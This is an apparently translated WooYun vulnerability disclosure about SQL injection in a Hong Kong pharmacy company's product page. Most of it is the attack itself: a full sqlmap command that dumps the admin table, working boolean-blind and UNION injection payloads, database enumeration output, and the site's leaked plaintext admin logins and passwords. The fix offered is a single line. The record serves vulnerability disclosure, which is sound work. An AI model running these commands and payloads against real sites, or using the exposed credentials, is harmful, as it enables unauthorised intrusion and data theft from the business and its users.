WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
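2015-11-20: Details reported to the vendor; awaiting vendor response
2015-11-24: Vendor confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and relevant domain experts
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
SQL injection in a page of 忠信中西大藥房有限公司 (the admin plaintext password can be obtained)
Address: http://**.**.**.**/tc/product-detail.php?cid=1&id=357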
python sqlmap.py -u "http://**.**.**.**/tc/product-detail.php?cid=1&id=357" -p cid --technique=BU --random-agent -D chungshu_db1 -T backend_user -C user_id,login,password --dump
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1' AND 8767=8767 AND 'UHsF'='UHsF&id=357

    Type: UNION query
    Title: MySQL UNION query (29) - 4 columns
    Payload: cid=-2577' UNION ALL SELECT 29,29,29,CONCAT(0x716a626271,0x427a4749676e5a7779584b695243795959727645544a4d6d73694b51464e4d6641566a6d694e776f,0x717a7a7071)#&id=357
---
web application technology: PHP 5.3.29, Apache 2.2.27
back-end DBMS: MySQL >= 5.0.0
current user: 'chungshu_user1@localhost'
current user is DBA: False
database management system users [1]:
[*] 'chungshu_user1'@'localhost'

available databases [2]:
[*] chungshu_db1
[*] information_schema

Database: chungshu_db1
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| attachment                            | 2389    |
| product                               | 486     |
| product_category                      | 6       |
| backend_user                          | 2       |
| setting                               | 1       |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 436     |
| GLOBAL_STATUS                         | 296     |
| SESSION_STATUS                        | 296     |
| GLOBAL_VARIABLES                      | 279     |
| SESSION_VARIABLES                     | 279     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| PARTITIONS                            | 38      |
| TABLES                                | 38      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 18      |
| PLUGINS                               | 10      |
| ENGINES                               | 8       |
| KEY_COLUMN_USAGE                      | 5       |
| STATISTICS                            | 5       |
| TABLE_CONSTRAINTS                     | 5       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:

Database: chungshu_db1
Table: attachment
[3 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| category_id | numeric     |
| table_name  | non-numeric |
| user_id     | numeric     |
+-------------+-------------+

Database: chungshu_db1
Table: backend_user
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| group_id | numeric     |
| login    | non-numeric |
| password | non-numeric |
| user_id  | numeric     |
+----------+-------------+

Database: chungshu_db1
Table: backend_user
[2 entries]
+---------+-------+----------+
| user_id | login | password |
+---------+-------+----------+
| 1       | admin | 222999   |
| 2       | tom   | tom123   |
+---------+-------+----------+
Deploy a WAF.
Severity: Medium
Vulnerability Rank: 5
Confirmation time: 2015-11-24 12:21
Referred to related parties.
None yet